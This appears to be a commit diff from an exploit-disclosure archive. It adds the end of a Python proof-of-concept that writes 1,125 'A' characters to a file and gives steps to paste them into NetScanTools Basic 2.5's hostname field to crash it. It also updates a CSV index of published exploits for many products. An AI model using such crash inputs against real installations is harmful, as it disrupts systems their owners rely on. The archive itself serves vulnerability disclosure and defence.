+# 2.- Open NetScanTools_Basic_Edition_2.5.txt and copy content to clipboard
+# 3.- Open NstBasic.exe
+# 4.- Ping and Traceroute Tools
+# 5.- Ping
+# 6.- Paste ClipBoard on Target Hostname or IPv4 Address
+# 7.- Do Ping
+# 8.- Crashed
+
+#!/usr/bin/env python
+ 
+buffer = "\x41" * 1125
+f = open ("NetScanTools_Basic_Edition_2.5.txt", "w")
+f.write(buffer)
+f.close()

files_exploits.csv

@@ -6027,6 +6027,9 @@ id,file,description,date,author,type,platform,port
 45077,exploits/windows/dos/45077.txt,"Windows Speech Recognition - Buffer Overflow (PoC)",2018-07-23,"Nassim Asrir",dos,windows,
 45087,exploits/windows/dos/45087.py,"GetGo Download Manager 6.2.1.3200 - Denial of Service (PoC)",2018-07-25,"Nathu Nandwani",dos,windows,
 45091,exploits/windows/dos/45091.py,"Core FTP 2.0 - 'XRMD' Denial of Service (PoC)",2018-07-26,"Erik David Martin",dos,windows,
+45092,exploits/windows/dos/45092.py,"QNap QVR Client 5.1.1.30070 - 'Password' Denial of Service (PoC)",2018-07-27,"Luis Martínez",dos,windows,
+45095,exploits/windows/dos/45095.py,"NetScanTools Basic Edition 2.5 - 'Hostname' Denial of Service (PoC)",2018-07-27,"Luis Martínez",dos,windows,
+45098,exploits/multiple/dos/45098.txt,"Skia - Heap Overflow in SkScan::FillPath due to Precision Error",2018-07-27,"Google Security Research",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -16642,6 +16645,7 @@ id,file,description,date,author,type,platform,port
 45044,exploits/multiple/remote/45044.rb,"Nanopool Claymore Dual Miner - APIs Remote Code Execution (Metasploit)",2018-07-17,Metasploit,remote,multiple,3333
 45052,exploits/hardware/remote/45052.py,"HomeMatic Zentrale CCU2 - Remote Code Execution",2018-07-18,"Kacper Szurek",remote,hardware,
 45079,exploits/windows/remote/45079.txt,"Microsoft Windows - 'dnslint.exe' Drive-By Download",2018-07-23,hyp3rlinx,remote,windows,
+45099,exploits/php/remote/45099.rb,"WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit)",2018-07-27,Metasploit,remote,php,80
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39379,7 +39383,7 @@ id,file,description,date,author,type,platform,port
 44414,exploits/windows/webapps/44414.txt,"DotNetNuke DNNarticle Module 11 - Directory Traversal",2018-04-06,"Esmaeil Rahimian",webapps,windows,
 44416,exploits/php/webapps/44416.txt,"Cobub Razor 0.7.2 - Cross-Site Request Forgery",2018-04-06,ppb,webapps,php,
 44612,exploits/windows/webapps/44612.txt,"Open-AudIT Professional - 2.1.1 - Cross-Site Scripting",2018-05-11,"Tejesh Kolisetty",webapps,windows,
-44417,exploits/php/webapps/44417.txt,"Wordpress Background Takeover < 4.1.4 - Directory Traversal",2018-04-09,"Colette Chamberland",webapps,php,
+44417,exploits/php/webapps/44417.txt,"WordPress Plugin Background Takeover < 4.1.4 - Directory Traversal",2018-04-09,"Colette Chamberland",webapps,php,
 44418,exploits/php/webapps/44418.txt,"WolfCMS 0.8.3.1 - Cross-Site Request Forgery",2018-04-09,"Sureshbabu Narvaneni",webapps,php,
 44419,exploits/php/webapps/44419.txt,"Cobub Razor 0.7.2 - Add New Superuser Account",2018-04-09,ppb,webapps,php,
 44420,exploits/php/webapps/44420.txt,"MyBB Plugin Recent Threads On Index - Cross-Site Scripting",2018-04-09,Perileos,webapps,php,
@@ -39599,12 +39603,12 @@ id,file,description,date,author,type,platform,port
 44837,exploits/php/webapps/44837.py,"Pagekit < 1.0.13 - Cross-Site Scripting Code Generator",2018-06-05,DEEPIN2,webapps,php,
 44839,exploits/hardware/webapps/44839.md,"Brother HL Series Printers 1.15 - Cross-Site Scripting",2018-06-04,"Huy Kha",webapps,hardware,
 44843,exploits/linux/webapps/44843.py,"Jenkins Mailer Plugin < 1.20 - Cross-Site Request Forgery (Send Email)",2018-06-05,Kl3_GMjq6,webapps,linux,
-44949,exploits/php/webapps/44949.txt,"Wordpress < 4.9.6 - (Authenticated) Arbitrary File Deletion",2018-06-27,VulnSpy,webapps,php,
+44949,exploits/php/webapps/44949.txt,"WordPress Core < 4.9.6 - (Authenticated) Arbitrary File Deletion",2018-06-27,VulnSpy,webapps,php,
 44943,exploits/php/webapps/44943.txt,"WordPress Plugin iThemes Security < 7.0.3 - SQL Injection",2018-06-25,"Çlirim Emini",webapps,php,80
 44945,exploits/java/webapps/44945.txt,"Liferay Portal < 7.0.4 - Server-Side Request Forgery",2018-06-26,"Mehmet Ince",webapps,java,80
 44851,exploits/php/webapps/44851.txt,"WampServer 3.0.6 - Cross-Site Request Forgery",2018-06-07,L0RD,webapps,php,
-44853,exploits/php/webapps/44853.txt,"WordPress Form Maker Plugin 1.12.24 - SQL Injection",2018-06-07,defensecode,webapps,php,
+44853,exploits/php/webapps/44853.txt,"WordPress Plugin Form Maker 1.12.24 - SQL Injection",2018-06-07,defensecode,webapps,php,
-44854,exploits/php/webapps/44854.txt,"WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection",2018-06-07,defensecode,webapps,php,
+44854,exploits/php/webapps/44854.txt,"WordPress Plugin Contact Form Maker 1.12.20 - SQL Injection",2018-06-07,defensecode,webapps,php,
 44855,exploits/php/webapps/44855.py,"Monstra CMS < 3.0.4 - Cross-Site Scripting",2018-06-07,DEEPIN2,webapps,php,
 44864,exploits/hardware/webapps/44864.py,"XiongMai uc-httpd 1.0.0 - Buffer Overflow",2018-06-08,"Andrew Watson",webapps,hardware,
 44865,exploits/linux/webapps/44865.txt,"Splunk < 7.0.1 - Information Disclosure",2018-06-08,KoF2002,webapps,linux,
@@ -39707,4 +39711,6 @@ id,file,description,date,author,type,platform,port
 45076,exploits/hardware/webapps/45076.py,"Davolink DVW 3200 Router - Password Disclosure",2018-07-23,"Ankit Anubhav",webapps,hardware,
 45078,exploits/hardware/webapps/45078.py,"Tenda Wireless N150 Router 5.07.50 - Cross-Site Request Forgery (Reboot Router)",2018-07-23,"Nathu Nandwani",webapps,hardware,80
 45084,exploits/hardware/webapps/45084.txt,"D-link DAP-1360 - Path Traversal / Cross-Site Scripting",2018-07-24,r3m0t3nu11,webapps,hardware,80
-45088,exploits/hardware/webapps/45088.txt,"Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass)",2018-07-26,vulnc0d3,webapps,hardware,
+45088,exploits/hardware/webapps/45088.txt,"Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass)",2018-07-26,vulnc0d3,webapps,hardware,80
+45094,exploits/linux/webapps/45094.txt,"Online Trade 1 - Information Disclosure",2018-07-27,Dhamotharan,webapps,linux,
+45097,exploits/php/webapps/45097.txt,"SoftNAS Cloud < 4.0.3 - OS Command Injection",2018-07-27,"Core Security",webapps,php,